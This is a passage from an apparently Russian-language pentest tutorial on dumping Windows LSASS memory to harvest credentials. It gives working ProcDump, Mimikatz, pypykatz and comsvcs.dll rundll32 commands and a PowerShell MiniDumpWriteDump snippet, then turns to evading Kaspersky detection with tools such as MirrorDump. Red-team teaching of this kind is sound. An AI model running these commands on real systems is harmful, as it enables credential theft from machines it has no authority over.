\u0434\u043e\u043b\u0433\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u0431\u044b\u043b \u043c\u0435\u0442\u043e\u0434 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0441\u043d\u0438\u043c\u043a\u0430 \u043f\u0430\u043c\u044f\u0442\u0438 LSASS \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u043b\u0443\u0436\u0435\u0431\u043d\u043e\u0439 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b <a href=\"https:\/\/docs.microsoft.com\/en-us\/sysinternals\/downloads\/procdump\">ProcDump<\/a> \u0438\u0437 \u0441\u043e\u0441\u0442\u0430\u0432\u0430 <a href=\"https:\/\/docs.microsoft.com\/en-us\/sysinternals\/\">Windows Sysinternals<\/a>. \u042d\u0442\u043e\u0442 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c \u0434\u0430\u043c\u043f\u044b \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432 \u0441 \u0446\u0435\u043b\u044c\u044e \u0438\u0445 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0433\u043e \u0430\u043d\u0430\u043b\u0438\u0437\u0430, \u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 lsass.exe \u0442\u043e\u043c\u0443 \u043d\u0435 \u0438\u0441\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 (\u0435\u0441\u043b\u0438 \u043f\u0440\u0430\u0432\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442, \u0440\u0430\u0437\u0443\u043c\u0435\u0435\u0442\u0441\u044f, \u0445\u0435-\u0445\u0435).<\/p>\n<details class=\"spoiler\">\n<summary>Cmd<\/summary>\n<div class=\"spoiler__content\">\n<pre><code>C:\\>procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp<\/code><\/pre>\n<\/p>\n<\/div>\n<\/details>\n<figure class=\"full-width\"><figcaption>\u0421\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0441\u043b\u0435\u043f\u043a\u0430 \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe<\/figcaption><\/figure>\n<p>\u0422\u0435\u043f\u0435\u0440\u044c \u043c\u043e\u0436\u043d\u043e \u043f\u0440\u0438\u0442\u0430\u0449\u0438\u0442\u044c \u0441\u043b\u0435\u043f\u043b\u0435\u043d\u043d\u044b\u0439 \u0434\u0430\u043c\u043f \u043a \u0441\u0435\u0431\u0435 \u043d\u0430 \u0442\u0430\u0447\u043a\u0443 \u0438 \u0440\u0430\u0441\u043f\u0430\u0440\u0441\u0438\u0442\u044c \u0435\u0433\u043e \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0442\u043e\u0433\u043e \u0436\u0435 Mimikatz.<\/p>\n<details class=\"spoiler\">\n<summary>Cmd<\/summary>\n<div class=\"spoiler__content\">\n<pre><code>C:\\>mimikatz.exe mimikatz # sekurlsa::minidump lsass.dmp mimikatz # sekurlsa::logonpasswords full mimikatz # exit  C:\\>mimikatz.exe \"sekurlsa::minidump lsass.dmp\" \"sekurlsa::logonpasswords full\" \"exit\"<\/code><\/pre>\n<\/p>\n<\/div>\n<\/details>\n<figure class=\"full-width\"><figcaption>\u041f\u0430\u0440\u0441\u0438\u043c lsass.dmp \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Mimikatz<\/figcaption><\/figure>\n<p>\u0418\u043b\u0438 \u0435\u0433\u043e \u0430\u043d\u0430\u043b\u043e\u0433\u0430 \u0434\u043b\u044f Linux \u2013 <a href=\"https:\/\/github.com\/skelsec\/pypykatz\">Pypykatz<\/a>.<\/p>\n<details class=\"spoiler\">\n<summary>Cmd<\/summary>\n<div class=\"spoiler__content\">\n<pre><code>~$ pypykatz lsa minidump lsass.dmp<\/code><\/pre>\n<\/p>\n<\/div>\n<\/details>\n<figure class=\"full-width\"><figcaption>\u041f\u0430\u0440\u0441\u0438\u043c lsass.dmp \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Pypykatz<\/figcaption><\/figure>\n<p>\u041f\u0440\u0435\u043b\u0435\u0441\u0442\u044c \u044d\u0442\u043e\u0433\u043e \u043c\u0435\u0442\u043e\u0434\u0430 \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0432\u0441\u0435 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u044b\u0435 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u043f\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044e \u0441\u043b\u0435\u043f\u043a\u0430 \u043f\u0430\u043c\u044f\u0442\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 ProcDump, \u043f\u043e\u0434\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 Microsoft, \u0438 \u044d\u0442\u0438\u0447\u043d\u043e\u043c\u0443 \u0432\u0437\u043b\u043e\u043c\u0449\u0438\u043a\u0443 \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u0442\u0430\u0449\u0438\u0442\u044c \u043d\u0430 \u0445\u043e\u0441\u0442 \u043d\u0438\u043a\u0430\u043a\u043e\u0439 \u043c\u0430\u043b\u0432\u0430\u0440\u0438. \u041e\u0434\u043d\u0430\u043a\u043e \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u0445 \u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u0442\u043e\u0436\u0435 \u0434\u043e\u043b\u0433\u043e \u043d\u0435 \u0441\u0442\u043e\u044f\u043b\u0438 \u0432 \u0441\u0442\u043e\u0440\u043e\u043d\u0435 \u0438 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e \u043f\u0440\u0438\u043a\u0440\u044b\u043b\u0438 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0434\u0435\u043b\u0430\u0442\u044c \u0434\u0430\u043c\u043f\u044b LSASS \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e ProcDump, \u0432\u043a\u043b\u044e\u0447\u0438\u0432 \u0435\u0433\u043e \u0432 \u0440\u0430\u0437\u0440\u044f\u0434 <code>PDM:HackTool.Win32.CreDump.rbaa<\/code>.<\/p>\n<figure class=\"full-width\"><figcaption>\u00ab\u041a\u0430\u0441\u043f\u0435\u0440\u0441\u043a\u0438\u0439\u00bb \u043d\u0435 \u0434\u043e\u0432\u043e\u043b\u0435\u043d \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c\u044e ProcDump<\/figcaption><\/figure>\n<h3>comsvcs.dll<\/h3>\n<p>\u0411\u0435\u0437\u0443\u0441\u043b\u043e\u0432\u043d\u043e, \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0439 \u043d\u0430\u0445\u043e\u0434\u043a\u043e\u0439 \u0441\u0442\u0430\u043b\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u044d\u043a\u0441\u043f\u043e\u0440\u0442\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 <strong>MiniDumpW<\/strong> \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u043e\u0439 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 <code>C:\\Windows\\System32\\comsvcs.dll<\/code>, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0434\u0435\u0440\u0433\u0430\u0435\u0442 \u0432\u044b\u0437\u043e\u0432 Win32 API <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/api\/minidumpapiset\/nf-minidumpapiset-minidumpwritedump\">MiniDumpWriteDump<\/a> \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0434\u0435\u043b\u0430\u0442\u044c \u0441\u043b\u0435\u043f\u043a\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432 \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043a\u043e\u043d\u0446\u0435\u043f\u0446\u0438\u0438 <a href=\"https:\/\/lolbas-project.github.io\/#\">Living Off The Land Binaries And Scripts<\/a> (LOLBAS), \u043a\u043e\u0433\u0434\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043d\u0435 \u043d\u0443\u0436\u043d\u043e \u043f\u0440\u0438\u043d\u043e\u0441\u0438\u0442\u044c \u043d\u0438\u0447\u0435\u0433\u043e \u043b\u0438\u0448\u043d\u0435\u0433\u043e \u043d\u0430 \u0430\u0442\u0430\u043a\u0443\u0435\u043c\u0443\u044e \u043c\u0430\u0448\u0438\u043d\u0443.<\/p>\n<figure class=\"full-width\"><figcaption>\u0410\u043d\u0430\u043b\u0438\u0437 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 comsvcs.dll \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e PE-bear<\/figcaption><\/figure>\n<p>\u042d\u0442\u0430 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 \u043b\u0435\u0433\u043b\u0430 \u0432 \u043e\u0441\u043d\u043e\u0432\u0443 \u043f\u0435\u0440\u0432\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0443\u0442\u0438\u043b\u0438\u0442\u044b <a href=\"https:\/\/github.com\/Hackndo\/lsassy\">lsassy<\/a>, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0434\u0435\u043b\u0430\u0442\u044c \u0441\u043b\u0435\u043f\u043a\u0438 LSASS \u0438 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0447\u0438\u0442\u0430\u0442\u044c \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u044b\u0435 \u043e\u0431\u043b\u0430\u0441\u0442\u0438 \u043f\u0430\u043c\u044f\u0442\u0438 \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0433\u043e \u0434\u0430\u043c\u043f\u0430, \u0430 \u043d\u0435 \u043f\u0435\u0440\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0435\u0433\u043e \u0446\u0435\u043b\u0438\u043a\u043e\u043c \u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u0443 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u0433\u043e (\u043f\u043e\u0434\u0440\u043e\u0431\u043d\u0435\u0435 \u043e \u043f\u0440\u0438\u043d\u0446\u0438\u043f\u0435 \u0440\u0430\u0431\u043e\u0442\u044b \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u0447\u0438\u0442\u0430\u0442\u044c <a href=\"https:\/\/en.hackndo.com\/remote-lsass-dump-passwords\/\">\u0432 \u0431\u043b\u043e\u0433\u0435<\/a> \u0430\u0432\u0442\u043e\u0440\u0430 \u0443\u0442\u0438\u043b\u0438\u0442\u044b).<\/p>\n<p>\u0415\u0441\u043b\u0438 \u0432\u0437\u0433\u043b\u044f\u043d\u0443\u0442\u044c <a href=\"https:\/\/github.com\/Hackndo\/lsassy\/blob\/f72eeb9eeeb22a37d6c94c6460fe7740e5e709ae\/lsassy\/dumpmethod\/comsvcs.py#L9-L14\">\u043d\u0430 \u043a\u043e\u0434<\/a>, \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u0439\u0442\u0438 \u0441\u0443\u043f\u0435\u0440\u0441\u043a\u0438\u0435 \u00ab\u043e\u0434\u043d\u043e\u0441\u0442\u0440\u043e\u0447\u043d\u0438\u043a\u0438\u00bb \u0434\u043b\u044f Cmd \u0438 PowerShell, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe \u0438 \u0441\u0434\u0430\u043c\u043f\u0438\u0442\u044c \u0435\u0433\u043e \u043f\u0430\u043c\u044f\u0442\u044c \u043f\u043e \u0437\u0430\u0434\u0430\u043d\u043d\u043e\u043c\u0443 \u043f\u0443\u0442\u0438.<\/p>\n<pre><code>C:\\>for \/f \"tokens=1,2 delims= \" ^%A in ('\"tasklist \/fi \"Imagename eq lsass.exe\" | find \"lsass\"\"') do rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump ^%B C:\\lsass.dmp full PS C:\\> rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\\lsass.dmp full<\/code><\/pre>\n<blockquote>\n<p>\u041f\u0440\u0438\u043c\u0435\u0447\u0430\u043d\u0438\u0435: \u043b\u0443\u0447\u0448\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f PowerShell-\u0432\u0435\u0440\u0441\u0438\u0435\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u044b, \u0442\u0430\u043a \u043a\u0430\u043a \u0434\u043b\u044f \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0438 PowerShell \u0432 \u043e\u0442\u043b\u0438\u0447\u0438\u0438 \u043e\u0442 Cmd \u043f\u043e \u0434\u0435\u0444\u043e\u043b\u0442\u0443 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f <code>SeDebugPrivilege<\/code> \u0434\u043b\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0441\u0435\u0441\u0441\u0438\u0438 \u0448\u0435\u043b\u043b\u0430, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u043d\u0430\u0434\u043e\u0431\u0438\u0442\u0441\u044f \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u043f\u0430\u043c\u044f\u0442\u0438 lsass.exe.<\/p>\n<\/blockquote>\n<figure class=\"full-width\"><figcaption>\u0414\u0430\u043c\u043f\u0438\u043c LSASS \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e LOLBAS-\u0442\u0435\u0445\u043d\u0438\u043a\u0438 comsvcs.dll<\/figcaption><\/figure>\n<p>\u0421\u0442\u043e\u0438\u0442 \u043b\u0438 \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u044c, \u0447\u0442\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0434\u0430\u043c\u043f\u0430 \u043f\u043e \u0442\u0430\u043a\u043e\u0439 \u043f\u0440\u043e\u0441\u0442\u043e\u0439 \u0442\u0435\u0445\u043d\u0438\u043a\u0435, \u0440\u0430\u0437\u0443\u043c\u0435\u0435\u0442\u0441\u044f, \u0431\u0443\u0434\u0435\u0442 \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u043e \u0445\u043e\u0442\u044f \u0431\u044b \u043c\u0430\u043b\u043e-\u043c\u0430\u043b\u044c\u0441\u043a\u0438 \u043d\u0435\u0440\u0430\u0432\u043d\u043e\u0434\u0443\u0448\u043d\u044b\u043c \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043e\u043c?<\/p>\n<h3>Out-Minidump.ps1<\/h3>\n<p>\u0415\u0449\u0435 \u043e\u0434\u0438\u043d \u0434\u0440\u0435\u0432\u043d\u0438\u0439 \u043a\u0430\u043a \u043c\u0438\u0440 \u0441\u043f\u043e\u0441\u043e\u0431 \u2014 \u043f\u043e\u0437\u0430\u0438\u043c\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c <a href=\"http:\/\/www.pinvoke.net\/default.aspx\/dbghelp\/MiniDumpWriteDump.html\">\u0438\u043c\u043f\u043e\u0440\u0442 P\/Invoke<\/a> \u0444\u0443\u043d\u043a\u0446\u0438\u0438 MiniDumpWriteDump \u0438\u0437 \u043a\u043b\u0430\u0441\u0441\u0430 <strong>NativeMethods<\/strong> \u0441\u0431\u043e\u0440\u043a\u0438 <code>System.Management.Automation.WindowsErrorReporting<\/code>, \u043a\u0430\u043a \u044d\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442\u0441\u044f \u0432 \u0441\u043a\u0440\u0438\u043f\u0442\u0435 <a href=\"https:\/\/github.com\/PowerShellMafia\/PowerSploit\/blob\/master\/Exfiltration\/Out-Minidump.ps1\">Out-Minidump.ps1<\/a> \u0438\u0437 \u0430\u0440\u0441\u0435\u043d\u0430\u043b\u0430 PowerSploit.<\/p>\n<details class=\"spoiler\">\n<summary>MiniDumpWriteDump<\/summary>\n<div class=\"spoiler__content\">\n<pre><code class=\"powershell\">$WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWriteDump<\/code><\/pre>\n<\/p>\n<\/div>\n<\/details>\n<figure class=\"full-width\"><figcaption>\u0410\u043d\u0430\u043b\u0438\u0437 \u0441\u0431\u043e\u0440\u043a\u0438 System.Management.Automation.WindowsErrorReporting \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e dnSpy<\/figcaption><\/figure>\n<p>\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0440\u0430\u0431\u043e\u0442\u044b \u0441\u043a\u0440\u0438\u043f\u0442\u0430 \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u0435\u043d \u0432\u044b\u0437\u043e\u0432\u0443 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 MiniDump \u0438\u0437 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u0433\u043e \u043c\u0435\u0442\u043e\u0434\u0430, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043e\u0441\u0442\u0430\u0432\u043b\u044e \u044d\u0442\u043e \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0443\u043f\u0440\u0430\u0436\u043d\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0447\u0438\u0442\u0430\u0442\u0435\u043b\u044f. \u041d\u0443 \u0438, \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e, \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u044b \u0442\u0430\u043a \u0436\u0435 \u043d\u0435\u0433\u0430\u0442\u0438\u0432\u043d\u043e \u043a \u043d\u0435\u043c\u0443 \u043e\u0442\u043d\u043e\u0441\u044f\u0442\u0441\u044f.<\/p>\n<h2>\u0414\u0430\u043c\u043f\u0438\u043c LSASS \u043f\u043e OPSEC-\u043e\u0432\u0441\u043a\u0438<\/h2>\n<p>\u0418\u0442\u0430\u043a, \u043f\u0435\u0440\u0435\u0439\u0434\u0435\u043c \u043a \u0441\u0430\u043c\u043e\u043c\u0443 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u043c\u0443: \u043a\u0430\u043a \u0436\u0435 \u043c\u043e\u0436\u043d\u043e \u00ab\u0443\u0433\u043e\u0434\u0438\u0442\u044c\u00bb \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u043c \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430\u043c \u0437\u0430\u0449\u0438\u0442\u044b \u0438 \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u0434\u0430\u043c\u043f \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe \u0432 \u0441\u0442\u0438\u043b\u0435 Operational Security?<\/p>\n<p>\u0417\u0430\u043f\u0440\u0435\u0442\u044b AV \u043d\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0441\u043b\u0435\u043f\u043a\u043e\u0432 \u043f\u0430\u043c\u044f\u0442\u0438 LSASS \u0443\u0441\u043b\u043e\u0432\u043d\u043e \u043c\u043e\u0436\u043d\u043e \u0440\u0430\u0437\u0434\u0435\u043b\u0438\u0442\u044c \u043d\u0430 3 \u0447\u0430\u0441\u0442\u0438:<\/p>\n<ol>\n<li>\n<p>\u0417\u0430\u043f\u0440\u0435\u0442 \u043d\u0430 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0434\u0435\u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe.<\/p>\n<\/li>\n<li>\n<p>\u0417\u0430\u043f\u0440\u0435\u0442 \u043d\u0430 \u0447\u0442\u0435\u043d\u0438\u0435 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0439 \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe.<\/p>\n<\/li>\n<li>\n<p>\u0417\u0430\u043f\u0440\u0435\u0442 \u043d\u0430 \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0438\u0440\u0443\u044e\u0449\u0435\u0433\u043e \u0434\u0430\u043c\u043f\u0430 \u043d\u0430 \u0434\u0438\u0441\u043a.<\/p>\n<\/li>\n<\/ol>\n<p>\u041d\u0438\u0436\u0435 \u043c\u044b \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0438\u043c 3 \u043f\u0440\u043e\u0435\u043a\u0442\u0430, \u043a\u0430\u0436\u0434\u044b\u0439 \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432 \u0441\u0432\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u043f\u043e\u043c\u043e\u0433\u0430\u043b \u043c\u043d\u0435 \u0438\u0437\u0432\u043b\u0435\u0447\u044c \u0447\u0443\u0432\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0438\u0437 \u043f\u0430\u043c\u044f\u0442\u0438 \u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u0443\u0437\u043b\u043e\u0432 \u043f\u0440\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u043c \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0435 KES \u043d\u0430 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0445 \u043f\u0435\u043d\u0442\u0435\u0441\u0442\u0430\u0445 \u0438\u043b\u0438 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u044f\u0445 Red Team.<\/p>\n<h3>MirrorDump<\/h3>\n<p>\u041f\u0435\u0440\u0432\u044b\u043c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u043c \u043c\u043d\u043e\u044e \u043f\u0440\u043e\u0435\u043a\u0442\u043e\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043d\u0430 \u0443\u0434\u0438\u0432\u043b\u0435\u043d\u0438\u0435 \u043c\u043e\u0433 \u043e\u0431\u0445\u043e\u0434\u0438\u0442\u044c \u0437\u0430\u0449\u0438\u0442\u0443 KES, \u0431\u044b\u043b <a href=\"https:\/\/github.com\/CCob\/MirrorDump\">MirrorDump<\/a> \u043e\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f <a href=\"https:\/\/twitter.com\/_EthicalChaos_\">@_EthicalChaos_<\/a>.<\/p>\n<p>\u0415\u0433\u043e \u043a\u043b\u044e\u0447\u0435\u0432\u044b\u0435 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0438:<\/p>\n<ul>\n<li>\n<p>\u041d\u0430\u043f\u0438\u0441\u0430\u043d \u043d\u0430 C#, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u0435\u0433\u043e \u0438\u0437 \u043f\u0430\u043c\u044f\u0442\u0438 \u0441\u0435\u0441\u0441\u0438\u0438 <a href=\"https:\/\/attack.mitre.org\/tactics\/TA0011\/\">C2<\/a> \u0438\u043b\u0438 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0430 .NET <code>Reflection.Assembly<\/code>.<\/p>\n<\/li>\n<li>\n<p>\u041f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u0442 \u043c\u0430\u0433\u0438\u044e <a href=\"https:\/\/github.com\/boo-lang\/boo\">Boo.Lang<\/a> \u0438 \u043f\u043b\u0430\u0433\u0438\u043d\u0430 <a href=\"https:\/\/github.com\/3F\/DllExport\">DllExport<\/a> \u0434\u043b\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u00ab\u043d\u0430 \u043b\u0435\u0442\u0443\u00bb \u043f\u0441\u0435\u0432\u0434\u043e\u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 LSA SSP \u0438 \u0435\u0433\u043e \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0432 \u043f\u0430\u043c\u044f\u0442\u044c LSASS \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0434\u0435\u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe \u0432\u043c\u0435\u0441\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f API <a href=\"http:\/\/undocumented.ntinternals.net\/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FProcess%2FNtOpenProcess.html\">NtOpenProcess.<\/a><\/p>\n<\/li>\n<li>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043f\u0440\u043e\u0435\u043a\u0442\u044b <a href=\"https:\/\/github.com\/TsudaKageyu\/minhook\">MiniHook<\/a> \u0438 <a href=\"https:\/\/github.com\/spazzarama\/SharpDisasm\">SharpDisasm<\/a> \u0434\u043b\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 userland-\u0445\u0443\u043a\u043e\u0432 \u043d\u0430 \u0432\u044b\u0437\u043e\u0432\u044b \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0445 API <code>MiniDumpWriteDump<\/code> \u0434\u043b\u044f \u043f\u0435\u0440\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u043e\u0442\u043e\u043a\u0430 \u0431\u0430\u0439\u0442 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0438\u0440\u0443\u044e\u0449\u0435\u0433\u043e \u0441\u043b\u0435\u043f\u043a\u0430 \u043f\u0430\u043c\u044f\u0442\u0438 lsass.exe \u0432 \u043f\u0430\u043c\u044f\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u044e\u0449\u0435\u0433\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430. \u0422\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0443 \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u0430 \u043f\u043e\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u0434\u0430\u043c\u043f \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u043e \u0441\u0435\u0442\u0438 \u0438 \u043d\u0435 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0442\u044c \u0435\u0433\u043e \u043d\u0430 \u0434\u0438\u0441\u043a \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0445\u043e\u0441\u0442\u0430.<\/p>\n<\/li>\n<\/ul>\n<p>\u0412 \u043c\u0438\u043d\u0443\u0441\u044b \u044d\u0442\u043e\u0433\u043e 